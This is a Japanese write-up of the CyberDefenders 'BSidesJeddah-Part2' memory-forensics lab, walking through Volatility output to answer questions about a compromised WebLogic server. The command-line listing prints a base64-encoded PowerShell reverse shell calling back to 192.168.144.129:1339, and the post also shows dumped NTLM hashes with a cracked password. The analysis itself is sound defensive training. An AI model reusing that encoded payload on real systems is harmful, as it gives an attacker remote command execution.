LoginSignup
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

この記事誰得? 私しか得しないニッチな技術で記事投稿!
@schectman-hell(tak Yassan)

【CyberDefenders】BSidesJeddah-Part2【Writeup】

Last updated at Posted at 2023-06-14

初めに

どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は CyberDefenders (以下リンク参考)の「BSidesJeddah-Part2」にチャレンジした際のWriteupになります。

※本チャレンジについてはRed側のペネトレというよりはBlue側の分析力を問われるものになります。

What is the SHA256 hash value of the RAM image?

以下コマンドでわかる。
1.png

Ans: 5b3b1e1c92ddb1c128eca0fa8c917c16c275ad4c95b19915a288a745f9960f39

What time was the RAM image acquired according to the suspect system? (YYYY-MM-DD HH:MM:SS)

以下コマンドでわかる。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.info.Info

2.png

Ans: 2021-08-06 16:13:23

What volatility2 profile is the most appropriate for this machine. imageinfo will take a long try to figure another way to determine the profile? (ex: Win10x86_14393)

こいつはVolatility2の方のコマンドでわかる。以下を叩く。

remnux@remnux:~/Downloads$ vol.py -f memory.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/remnux/Downloads/memory.mem)
                      PAE type : No PAE
                           DTB : 0x1ab000L
                          KDBG : 0xf8024b96a500L
          Number of Processors : 4
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8024b9bc000L
                KPCR for CPU 1 : 0xffffa601d4e00000L
                KPCR for CPU 2 : 0xffffa601d4c40000L
                KPCR for CPU 3 : 0xffffa601d4cc3000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-08-06 16:13:23 UTC+0000
     Image local date and time : 2021-08-06 09:13:23 -0700
remnux@remnux:~/Downloads$

文字数で当てはまるものを投入。

Ans: Win2016x64_14393

What is the computer's name?

環境変数周りを確認する。以下コマンドである程度分かる。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.envars.Envars
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Block	Variable	Value

4.png
ただ見づらいのでgrep COMPUTERNAME辺りでフィルタる。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.envars.Envars | grep COMPUTERNAME
560gresswinlogon.exe	0x2bb9af213e0canCOMPUTERNAME	WIN-8QOTRH7EMHC
568	wininit.exe	0x1c700f413e0	COMPUTERNAME	WIN-8QOTRH7EMHC
652	services.exe	0x25283c21730	COMPUTERNAME	WIN-8QOTRH7EMHC
664	lsass.exe	0x2536c841730	COMPUTERNAME	WIN-8QOTRH7EMHC
764	svchost.exe	0x1e752421910	COMPUTERNAME	WIN-8QOTRH7EMHC
824	svchost.exe	0x29276aa19a0	COMPUTERNAME	WIN-8QOTRH7EMHC
912	dwm.exe	0x18925da1730	COMPUTERNAME	WIN-8QOTRH7EMHC
972	svchost.exe	0x24f47da1910	COMPUTERNAME	WIN-8QOTRH7EMHC
996	svchost.exe	0x1bd02dd1990	COMPUTERNAME	WIN-8QOTRH7EMHC
508	svchost.exe	0x207a00b1910	COMPUTERNAME	WIN-8QOTRH7EMHC
400	svchost.exe	0x184ddf21990	COMPUTERNAME	WIN-8QOTRH7EMHC
944	svchost.exe	0x1e875f71990	COMPUTERNAME	WIN-8QOTRH7EMHC
1092	svchost.exe	0x23f7cb41990	COMPUTERNAME	WIN-8QOTRH7EMHC
1100	svchost.exe	0x1a9ed7019a0	COMPUTERNAME	WIN-8QOTRH7EMHC
1592	spoolsv.exe	0x19363c31910	COMPUTERNAME	WIN-8QOTRH7EMHC
1668	svchost.exe	0x24a25ef1910	COMPUTERNAME	WIN-8QOTRH7EMHC
1732	svchost.exe	0x17bae201910	COMPUTERNAME	WIN-8QOTRH7EMHC

...省略

NAMEが見えたので回答。

Ans: WIN-8QOTRH7EMHC

What is the system IP address?

以下のコマンドである程度把握できる。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.netscan.NetScan
Volatility 3 Framework 2.4.1

5.png

Ans: 192.168.144.131

How many established network connections were at the time of acquisition?

ESTABLISHEDでフィルタればいい。
6.png
12行ある。

Ans: 12

What is the PID of explorer.exe?

以下のコマンドで見ることが可能。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pslist.PsList | grep explorer.exe
2676ress114000.0explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A	Disabled
remnux@remnux:~/Downloads$

Ans: 2676

What is the title of the webpage the admin visited using IE?

こいつはVolatility2の方のコマンドでわかる。iehistoryだ。
Q2の方でわかったWindowsのプロファイルバージョンで回してみる。

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393 iehistory
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
**************************************************
Process: 2676 explorer.exe
Cache type "DEST" at 0x629d939
Last modified: 2021-08-06 08:39:52 UTC+0000
Last accessed: 2021-08-06 15:39:52 UTC+0000
URL: Administrator@https://news.google.com/topstories?hl=en-US&gl=US&ceid=US:en
Title: Google News
remnux@remnux:~/Downloads$

タイトルが判明する。

Ans: Google News

What company developed the program used for memory acquisition?

メモリフォレンジックの際にはMalciousなプロセスが打ったコマンドを調べてみると、難読化されたC2アドレスやコマンドが隠されている場合があるのでとりあえずwindows.cmdline.CmdLineを調べておくのは鉄則である。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.cmdline.CmdLine
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Args

4	System	Required memory at 0x20 is not valid (process exited?)
292	smss.exe	\SystemRoot\System32\smss.exe
412	csrss.exe	%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
504	smss.exe	Required memory at 0xbc4f0cb020 is not valid (process exited?)
512	csrss.exe	%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
560	winlogon.exe	winlogon.exe
568	wininit.exe	wininit.exe
652	services.exe	C:\Windows\system32\services.exe
664	lsass.exe	C:\Windows\system32\lsass.exe
764	svchost.exe	C:\Windows\system32\svchost.exe -k DcomLaunch
824	svchost.exe	C:\Windows\system32\svchost.exe -k RPCSS
912	dwm.exe	"dwm.exe"
972	svchost.exe	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
996	svchost.exe	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
508	svchost.exe	C:\Windows\system32\svchost.exe -k netsvcs
400	svchost.exe	C:\Windows\system32\svchost.exe -k LocalService
944	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1092	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1100	svchost.exe	C:\Windows\system32\svchost.exe -k NetworkService
1592	spoolsv.exe	C:\Windows\System32\spoolsv.exe
1668	svchost.exe	C:\Windows\System32\svchost.exe -k utcsvc
1732	svchost.exe	C:\Windows\System32\svchost.exe -k smbsvcs
1764	svchost.exe	C:\Windows\system32\svchost.exe -k appmodel
1852	wlms.exe	C:\Windows\system32\wlms\wlms.exe
1876	MsMpEng.exe	"C:\Program Files\Windows Defender\MsMpEng.exe"
1896	vm3dservice.ex	C:\Windows\system32\vm3dservice.exe
1904	vmtoolsd.exe	"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
1912	VGAuthService.	"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
892	vm3dservice.ex	vm3dservice.exe -n
2136	svchost.exe	C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
2812	dllhost.exe	C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
2912	msdtc.exe	C:\Windows\System32\msdtc.exe
3004	WmiPrvSE.exe	C:\Windows\system32\wbem\wmiprvse.exe
2560	WmiPrvSE.exe	C:\Windows\system32\wbem\wmiprvse.exe
3176	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
4064	RuntimeBroker.	C:\Windows\System32\RuntimeBroker.exe -Embedding
2196	sihost.exe	sihost.exe
2756	svchost.exe	C:\Windows\system32\svchost.exe -k UnistackSvcGroup
2424	taskhostw.exe	taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1140	userinit.exe	Required memory at 0x59eced020 is not valid (process exited?)
2676	explorer.exe	C:\Windows\Explorer.EXE
3496	ShellExperienc	"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
3408	SearchUI.exe	"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
2552	ServerManager.	"C:\Windows\system32\ServerManager.exe" 
3732	vmtoolsd.exe	"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
4172	jusched.exe	"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" 
4356	cmd.exe	"C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd" 
4364	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4456	java.exe	"C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe"   -server -Xms32m -Xmx200m -Djdk.tls.ephemeralDHKeySize=2048 -Dcoherence.home=C:\Users\ADMINI~1\Desktop\wls1411\coherence -Dbea.home=C:\Users\ADMINI~1\Desktop\wls1411  -Dweblogic.RootDirectory=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1  -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader "-Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy" "-Dweblogic.nodemanager.JavaHome=C:\PROGRA~1\Java\JDK18~1.0_2" weblogic.NodeManager -v
4556	cmd.exe	"C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd" 
4564	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4736	cmd.exe	cmd  /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
4752	java.exe	C:\PROGRA~1\Java\JDK18~1.0_2\bin\java  -server   -Xms256m -Xmx512m  -cp C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic-launcher.jar -Dlaunch.use.env.classpath=true -Dweblogic.Name=AdminServer -Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy  -Dweblogic.ProductionModeEnabled=true -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader  -javaagent:C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\debugpatch-agent.jar -da -Dwls.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server -Dweblogic.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server     -Djava.endorsed.dirs=C:\PROGRA~1\Java\JDK18~1.0_2\jre\lib\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\oracle_common\modules\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\wlserver\modules\endorsed  weblogic.Server
4772	java.exe	"C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe"  -Djava.security.manager -Djava.security.policy=C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\derbyServer.policy "-Dderby.system.home=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1\common\db" -classpath "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derby.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbynet.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyclient.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbytools.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyoptionaltools.jar" org.apache.derby.drda.NetworkServerControl start 
1392	jucheck.exe	"C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
2824	fontdrvhost.ex	"fontdrvhost.exe"
840	armsvc.exe	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
4344	powershell.exe	powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEANAA0AC4AMQAyADkAIgAsADEAMwAzADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
4636	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4200	powershell.exe	Required memory at 0x9888ee7020 is not valid (process exited?)
2712	powershell.exe	Required memory at 0xab2c6e7020 is not valid (process exited?)
2132	powershell.exe	Required memory at 0x9bb4dd9020 is not valid (process exited?)
4264	powershell.exe	Required memory at 0x1002ac020 is not valid (process exited?)
3684	powershell.exe	Required memory at 0xe6d36ae020 is not valid (process exited?)
3676	powershell.exe	Required memory at 0x65c73a1020 is not valid (process exited?)
3520	powershell.exe	Required memory at 0xa36029e020 is not valid (process exited?)
1012	powershell.exe	Required memory at 0x5afb111020 is not valid (process exited?)
2200	powershell.exe	Required memory at 0x91e1d32020 is not valid (process exited?)
776	powershell.exe	Required memory at 0xe57ea22020 is not valid (process exited?)
1616	powershell.exe	Required memory at 0x508be21020 is not valid (process exited?)
2688	mmc.exe	"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1488	svchost.exe	"C:\Users\Administrator\Desktop\svchost.exe"
4596	notepad.exe	"C:\Windows\System32\notepad.exe" exfiltrator.txt
2568	RamCapture64.e	"C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe" 
3524	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
remnux@remnux:~/Downloads$

この結果を見てみるとPID 2568でRamCapture64.eが回っていることがわかる。
これでDump取ったのかな?このファイル名を調べてみると、以下のサイトで見つかった。

この企業名を答える。

Ans: BelkaSoft

What is the administrator user password?

NTLMハッシュ値を取りに行く。以下コマンドでゲットする。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.hashdump.Hashdump
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
User	rid	lmhash	nthash

Administrator	500	aad3b435b51404eeaad3b435b51404ee	3aff70b832f6170bda6f7b641563f60b
Guest	501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount	503	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
remnux@remnux:~/Downloads$

以下サイトで復号可能である。

10.png

Ans: 52(dumbledore)oxim_

What is the version of the WebLogic server installed on the system?

これはQ16までわからなかった問題です。
ネタバレを行うと、cve-2020-14882の攻撃をこのマシンは受けていて、その影響のあるWeblogicのバージョンから答えを導きました。
影響を受けるバージョンはトレンドマイクロのBlogを確認しましょう。

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

上記のバージョンからどれを選ぶかですが、FileDumpを確認すればフォルダ名にその名称が記載されていました。windows.filescan.Filescanコマンドで確認しました。
11.png
14.1.1.0.0ですね。

Ans: 14.1.1.0.0

The admin set a port forward rule to redirect the traffic from the public port to the WebLogic admin portal port. What is the public and WebLogic admin portal port number? Format PublicPort:WebLogicPort (22:1337)

windows.netscan.Netscanを確認すればいいです。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.netscan.NetScan
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
Offset	Proto	LocalAddr	LocalPort	ForeignAddr	ForeignPort	State	PID	Owner	Created

0xb68cb05a9300	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb05a9300	TCPv6	::	49668	::	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb0751010	TCPv4	192.168.144.131	80	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:45.000000 
0xb68cb0766d40	UDPv6	::1	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb079bbd0	UDPv6	::1	60614	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb0a9fec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb0f05350	UDPv4	192.168.144.131	138	*	0		4	System	2021-08-06 15:26:24.000000 
0xb68cb1254ec0	TCPv4	0.0.0.0	135	0.0.0.0	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1cd12f0	TCPv4	0.0.0.0	135	0.0.0.0	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1cd12f0	TCPv6	::	135	::	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1e278a0	TCPv4	0.0.0.0	49664	0.0.0.0	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb1e278a0	TCPv6	::	49664	::	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb1ec97a0	TCPv4	192.168.144.131	139	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:24.000000 
0xb68cb1ed8ec0	UDPv4	0.0.0.0	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb1ed8ec0	UDPv6	::	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb1f099e0	UDPv4	192.168.144.131	137	*	0		4	System	2021-08-06 15:26:24.000000 
0xb68cb1f6e740	TCPv4	127.0.0.1	49676	127.0.0.1	49675	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb1fc0dc0	TCPv4	0.0.0.0	49664	0.0.0.0	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb22479f0	UDPv4	192.168.144.131	60615	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb22a9430	UDPv4	127.0.0.1	60616	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb22a9ec0	UDPv6	fe80::5caf:aaae:b035:834d	60613	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb230b010	UDPv4	0.0.0.0	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb2315dd0	UDPv4	127.0.0.1	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb231f480	UDPv4	192.168.144.131	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb2344cf0	TCPv4	0.0.0.0	49669	0.0.0.0	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb2344cf0	TCPv6	::	49669	::	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb2352330	TCPv4	0.0.0.0	49669	0.0.0.0	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb23b3aa0	UDPv4	0.0.0.0	5050	*	0		400	svchost.exe	2021-08-06 15:28:56.000000 
0xb68cb2404540	UDPv4	0.0.0.0	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2405ec0	UDPv4	0.0.0.0	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2405ec0	UDPv6	::	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2421b30	UDPv4	0.0.0.0	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb24444e0	UDPv4	0.0.0.0	0	*	0		508	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb24444e0	UDPv6	::	0	*	0		508	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb246dd50	UDPv4	0.0.0.0	0	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb246dd50	UDPv6	::	0	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb24aeec0	TCPv4	0.0.0.0	445	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:38.000000 
0xb68cb24aeec0	TCPv6	::	445	::	0	LISTENING	4	System	2021-08-06 15:26:38.000000 
0xb68cb24b8540	UDPv4	0.0.0.0	0	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb24ba010	UDPv4	0.0.0.0	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb24e88f0	TCPv4	0.0.0.0	47001	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24e88f0	TCPv6	::	47001	::	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24ff8f0	TCPv4	0.0.0.0	5985	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24ff8f0	TCPv6	::	5985	::	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb26862d0	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb268ca30	TCPv4	0.0.0.0	49665	0.0.0.0	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb268ca30	TCPv6	::	49665	::	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb268e9c0	TCPv4	0.0.0.0	49665	0.0.0.0	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb26cdcf0	TCPv4	0.0.0.0	49666	0.0.0.0	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb26cdcf0	TCPv6	::	49666	::	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb26dbad0	UDPv4	0.0.0.0	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb26dbad0	UDPv6	::	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb271e340	TCPv4	0.0.0.0	49666	0.0.0.0	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb27f2d80	UDPv4	0.0.0.0	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb28323e0	TCPv4	0.0.0.0	49667	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb28323e0	TCPv6	::	49667	::	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb2867460	TCPv4	0.0.0.0	49667	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb28a88a0	UDPv4	0.0.0.0	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a88a0	UDPv6	::	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a8ec0	UDPv4	0.0.0.0	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a8ec0	UDPv6	::	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28aad30	UDPv4	0.0.0.0	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb29366a0	UDPv4	0.0.0.0	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb29366a0	UDPv6	::	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb2a89010	TCPv4	127.0.0.1	49678	127.0.0.1	49677	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2b50010	TCPv4	127.0.0.1	49675	127.0.0.1	49676	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2b74860	UDPv6	fe80::5caf:aaae:b035:834d	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb2c58a50	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2cc8580	TCPv4	127.0.0.1	49680	127.0.0.1	49679	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2ccc010	TCPv4	127.0.0.1	49679	127.0.0.1	49680	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2cffb20	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	5556	::	0	LISTENING	4456	java.exe	2021-08-06 15:30:03.000000 
0xb68cb2cffc70	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	1527	::	0	LISTENING	4772	java.exe	2021-08-06 15:30:07.000000 
0xb68cb2e135c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb2e57ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2f2eb70	TCPv4	192.168.144.131	49674	51.103.5.186	443	ESTABLISHED	2676	explorer.exe	2021-08-06 15:29:22.000000 
0xb68cb31c6380	TCPv4	127.0.0.1	49682	127.0.0.1	49681	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb31c7010	TCPv4	127.0.0.1	49681	127.0.0.1	49682	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb31e5010	TCPv4	127.0.0.1	49687	127.0.0.1	49686	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb31f0d00	TCPv4	127.0.0.1	49677	127.0.0.1	49678	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb3236b90	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3236b90	UDPv6	::	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3237830	TCPv4	192.168.144.131	49869	192.168.144.129	1339	CLOSE_WAIT	4344	powershell.exe	2021-08-06 15:51:40.000000 
